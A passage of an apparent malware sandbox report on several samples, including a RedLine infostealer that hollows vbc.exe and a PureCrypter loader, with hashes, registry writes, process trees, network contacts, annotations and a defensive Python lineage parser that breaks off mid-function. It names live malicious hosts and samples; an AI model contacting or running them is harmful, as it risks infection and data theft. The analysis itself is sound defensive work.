SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/4748-340-0x0000000034CC0000-0x0000000035CC0000-memory.dmp

memory/4748-343-0x0000000049890000-0x0000000049915000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\omni.ja

MD5 3569909da198e6681650054ebafa2190
SHA1 dd4fd1cb0c899b98a2322657b77787ce18f3d7ac
SHA256 cd02424977b06035e2d3f6c6a75c488b11480b135e817bc870589df608b8a112
SHA512 571faa39b136aff1f32957f85e6cef34f5f7f26596ab2563f719c7e857e20bbb0aa520d41bc8edd8bc9f835a11c24f5531b2e854c7ad521843390387e8774404

memory/4748-348-0x0000000049B60000-0x0000000049BC4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 cbd67300a1b97005c288550af7942b8f
SHA1 929592e3fc36c2d18ef541c65d798f1ed4ad558e
SHA256 c6150ebeaca05e32c24d358dfc6e0984324c84b819d57c77107dbc63a40f2e2e
SHA512 41c06af16fe2340a2d546b252857bbf29a87589f23a2d169462274f557ba73240823daec4eb6fe8aff270d40e20a4658709ecbc4112a1547b577a1012cda2346

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 7b3f9454b5839584f6bbe4ce0638250e
SHA1 95010293da90d63f1f39c1404373bb313fd32d89
SHA256 8a62787f7a8eb7ddac05dadc6254e3c49a254fe10e3bd21f7b229f57b4d2e3af
SHA512 634239e5f569754b1fb46cd5eaf0b074a6d88ba3678ed96b72fd4c0dd3ab9866a77ad9fbc122a5736bbd89a15337efa6039ec6c43b0be8beac0a6446e8fc64e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e2221c6301727cd1b2adffe308c15728
SHA1 92fb0f132888e9bd32b8d6be5832c8571581618c
SHA256 7e545868f36b3755c80466719c6d8920179f398136c0f6d99f986f4ace744329
SHA512 3f7ee9c5a809487e67e2ed5d8fd2130e5069b59e669abb2cc0ed9537504e6cd745af950e142247b45e78074a67caa855b9194d42ca3a7a16e6b6ce98114e1b5a

C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml

MD5 915c57cdbffb1a77efc21e2e004e6f7e
SHA1 1f76377a7ed327aaa87f4b4f43f028721e96fb1a
SHA256 18dd7af08cc8cee0cc79c17e5a411a16878f98d5bfdc676f42370ad27ff5aa00
SHA512 fa985685aa1e56f779bc0d6b144ad31f770f18252870e5e63243bdef676a212ee8452f60f4a0af4476e7707e77ae90b3f742a7ffbbc8d2d6cf2628383a80231e

C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml

MD5 a34f1550125d7aeff98af080c0472cf6
SHA1 c467a5d721c78b570606091a393a9b9b66423bfd
SHA256 197c9900b4e837627a911aa5b6c827ae8b45ac24c711d28325db451128f328a5
SHA512 0cc8a40b912c4e0df4db03b10a82d398dc7833d3c0a7de100436e84da59122037bfdd0d7554a40e0adb7a2a8e508a92e903d983c54db0758d8a4a5ba8197a7b0

C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml

MD5 fd1e5f7e6d4ba02f19cd04987e89aaa0
SHA1 e6aea34f856582af5a07991624a41dceaea84562
SHA256 d68de4e1fbc953f2aeb34852a1a15e65e858344af1875ea6f2bbf9ca310fa71f
SHA512 e84a9ef02a58510eed0dac3924170cf12fc85b505665d86b15c0ee1d6f19a66bd231e4461e52e0af7cb6990a821afafaedb50c975204f61e8a75056c26d0cdc4

C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml

MD5 b2407ed7c6a616158688e9b988f13f4b
SHA1 55b5041b16079e33a68b433304df423deeda71c4
SHA256 03f4fb9a1d7025f28fa8cefc0cf7437586b7c3eb26a5f3171a3bac24f1e62c7b
SHA512 20c99a6dd4a679a99232ade17682270e2522a005c797c4912095b6aaf48301ac8176727e15b1e4d6643f04d8855c293c760b8902ddcf8b0f745eac14268fd3eb

C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml

MD5 2335af0a295e267dfd6912d7d89eb008
SHA1 0bdbd0b7cb70a4fc808e9e98be349cd1e5a6b424
SHA256 0a9608aa0dc1e97d9b43f14afbfec3f65507cfba5153a571391787b3bcafc537
SHA512 0e06c7f5707c28da79012520ce7288a046e56816d0a384aeaa9625132dacacff3fca881382c643310547058d85d903e3fc839c261bb5f59d3910052e5893b281

memory/4748-359-0x000000004A670000-0x000000004A6E5000-memory.dmp

memory/4748-362-0x000000004A7B0000-0x000000004A869000-memory.dmp

memory/2444-365-0x0000000010000000-0x0000000011000000-memory.dmp

memory/2444-367-0x0000000010630000-0x0000000011630000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win10v2004-20221111-en

Max time kernel

84s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A (15 identical entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A (8 identical entries)

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A

Checks installed software on the system

discovery

Modifies system certificate store

evasion spyware trojan
Writes under AuthRoot\Certificates are also produced by Windows' automatic root update, which fetches a missing third-party root when a TLS chain is validated, so this signature is weak evidence on its own; check the two thumbprints below against the Microsoft trusted root list before treating them as attacker-installed roots. The certificate blob data was not preserved in this copy of the report.
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A (3 identical entries)
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A (2 identical entries)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A (14 identical entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A (16 identical entries)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe (3 identical entries)
PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe (3 identical entries)
PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe (3 identical entries)
PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe (3 identical entries)

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hhwnd=589872 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe

.\GenericSetup.exe hhwnd=589872 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hready

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe

.\GenericSetup.exe hready

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1288 -ip 1288

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 3572

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 www.dlsft.com udp
N/A 35.190.60.70:443 www.dlsft.com tcp
N/A 35.190.60.70:443 www.dlsft.com tcp
N/A 8.8.8.8:53 dlsft.com udp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 8.8.8.8:53 flow.lavasoft.com udp
N/A 104.18.88.101:443 flow.lavasoft.com tcp
N/A 8.8.8.8:53 sos.adaware.com udp
N/A 104.16.235.79:443 sos.adaware.com tcp
N/A 104.16.235.79:443 sos.adaware.com tcp
N/A 104.16.235.79:443 sos.adaware.com tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 104.80.225.205:443 tcp
N/A 8.8.8.8:53 226.101.242.52.in-addr.arpa udp
N/A 8.253.208.121:80 tcp
N/A 8.253.208.121:80 tcp

Files

memory/5040-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

memory/1288-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe.config

MD5 fd63ee3928edd99afc5bdf17e4f1e7b6
SHA1 1b40433b064215ea6c001332c2ffa093b1177875
SHA256 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9
SHA512 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4

memory/1288-139-0x00000000009C0000-0x00000000009CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

memory/1288-143-0x00000000052A0000-0x00000000052AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

memory/1288-147-0x0000000005D50000-0x000000000642A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

memory/1288-151-0x00000000056B0000-0x00000000056D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

memory/1288-155-0x0000000005770000-0x000000000579C000-memory.dmp

memory/1288-156-0x0000000005A00000-0x0000000005A66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

memory/1288-160-0x0000000005CF0000-0x0000000005D02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

memory/1288-164-0x0000000006EF0000-0x0000000006F6C000-memory.dmp

memory/1288-165-0x0000000007B30000-0x00000000080D4000-memory.dmp

memory/1288-166-0x0000000007860000-0x00000000078F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GenericSetup.exe_1673806433\sciter32.dll

MD5 b431083586e39d018e19880ad1a5ce8f
SHA1 3bbf957ab534d845d485a8698accc0a40b63cedd
SHA256 b525fdcc32c5a359a7f5738a30eff0c6390734d8a2c987c62e14c619f99d406b
SHA512 7805a3464fcc3ac4ea1258e2412180c52f2af40a79b540348486c830a20c2bbed337bbf5f4a8926b3ef98c63c87747014f5b43c35f7ec4e7a3693b9dbd0ae67b

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

memory/1288-171-0x00000000065A0000-0x00000000065CE000-memory.dmp

memory/2036-172-0x0000000000000000-mapping.dmp

memory/856-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe.config

MD5 fd63ee3928edd99afc5bdf17e4f1e7b6
SHA1 1b40433b064215ea6c001332c2ffa093b1177875
SHA256 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9
SHA512 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

Analysis: behavioral3

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20220812-en

Max time kernel

145s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

Signatures

PureCrypter

loader downloader purecrypter

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A

Adds Run key to start application

persistence
The RunOnce value below is the standard cleanup entry written by the Windows self-extractor (wextract.exe): at the next logon rundll32.exe calls DelNodeRunDLL32 in advpack.dll to delete the IXP000.TMP extraction folder. It does not restart the payload, so the persistence tag is a false positive for this entry; the useful fact is that Installer.exe is a wextract package that extracted dienetwoov.exe into IXP000.TMP and ran it (see Executes dropped EXE above).
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 falcaoliderfm.com.br udp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp

Files

memory/1120-54-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

memory/1120-57-0x0000000000EE0000-0x0000000000EE8000-memory.dmp

memory/1120-58-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

memory/1120-59-0x0000000004855000-0x0000000004866000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:17

Platform

win10v2004-20221111-en

Max time kernel

159s

Max time network

214s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

Signatures

RedLine

infostealer redline

Uses the VBS compiler for execution (vbc.exe is the Visual Basic .NET compiler shipped with the .NET Framework, started here with no arguments)

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3596 set thread context of 3048 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
A parent that starts a Microsoft-signed system binary with no arguments and then sets its thread context is the process-hollowing pattern: the RedLine payload executes inside vbc.exe, which is why the EnumeratesProcesses and SeDebugPrivilege entries below are attributed to vbc.exe rather than to the dropped sample.
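
The WriteProcessMemory table in behavioral2 and the SetThreadContext row above give parent and child PIDs one event at a time, and the chain from Furk Ultra_10298.exe through setup10298.exe to GenericSetup.exe has to be reassembled by hand. The following Python script is an added example, not part of the sandbox report: it parses rows in the report's own column layout, collapses repeated rows into one edge per parent, child and event type with a count, prints the process lineage for each detonation, and flags a parent that set the thread context of a binary under C:\Windows, which is the process-hollowing shape. The row text is copied from this report; the regular expression and the hollowing heuristic are this example's own.

```python
import re
from collections import OrderedDict

# Rows copied from this report: the twelve "Suspicious use of
# WriteProcessMemory" rows from behavioral2 and the single "Suspicious use of
# SetThreadContext" row from behavioral6. Column order is Description,
# Indicator, Process, Target, with "N/A" for an empty column.
REPORT_ROWS = [
    r"PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe",
    r"PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe",
    r"PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe",
    r"PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe",
    r"PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe",
    r"PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe",
    r"PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe",
    r"PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe",
    r"PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe",
    r"PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe",
    r"PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe",
    r"PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe",
    r"PID 3596 set thread context of 3048 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
]

# Process paths may contain spaces, so the split between the Process and
# Target columns is anchored on the drive-letter prefix of the Target path.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<kind>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) N/A (?P<src_path>.+?) (?P<dst_path>[A-Za-z]:\\.+)$"
)


def parse_rows(rows):
    """One dict per row that matches the report layout; other rows are skipped."""
    events = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            events.append({"src": int(m["src"]), "dst": int(m["dst"]),
                           "kind": m["kind"], "src_path": m["src_path"],
                           "dst_path": m["dst_path"]})
    return events


def build_graph(events):
    """Collapse repeated rows into one (src, dst, kind) edge with a count."""
    names, edges, children = OrderedDict(), OrderedDict(), {}
    for e in events:
        names.setdefault(e["src"], e["src_path"])
        names.setdefault(e["dst"], e["dst_path"])
        key = (e["src"], e["dst"], e["kind"])
        edges[key] = edges.get(key, 0) + 1
        kids = children.setdefault(e["src"], [])
        if e["dst"] not in kids:
            kids.append(e["dst"])
    targets = {dst for (_, dst, _) in edges}
    roots = [pid for pid in names if pid not in targets]   # never a target
    return {"names": names, "edges": edges, "children": children, "roots": roots}


def render(graph, pid=None, depth=0, out=None):
    """Indented lineage: each process, then the events it performed on children."""
    out = [] if out is None else out
    if pid is None:
        for root in graph["roots"]:
            render(graph, root, 0, out)
        return out
    base = graph["names"][pid].rsplit("\\", 1)[-1]
    out.append("  " * depth + f"{pid} {base}")
    for child in graph["children"].get(pid, []):
        for (s, d, kind), n in graph["edges"].items():
            if s == pid and d == child:
                out.append("  " * (depth + 1) + f"-- {kind} {child} (x{n})")
        render(graph, child, depth + 1, out)
    return out


def hollowing_candidates(graph):
    """Parents that set the thread context of a binary installed under
    C:\\Windows: the process-hollowing shape (a heuristic, not proof)."""
    return [(src, dst) for (src, dst, kind) in graph["edges"]
            if kind == "set thread context of"
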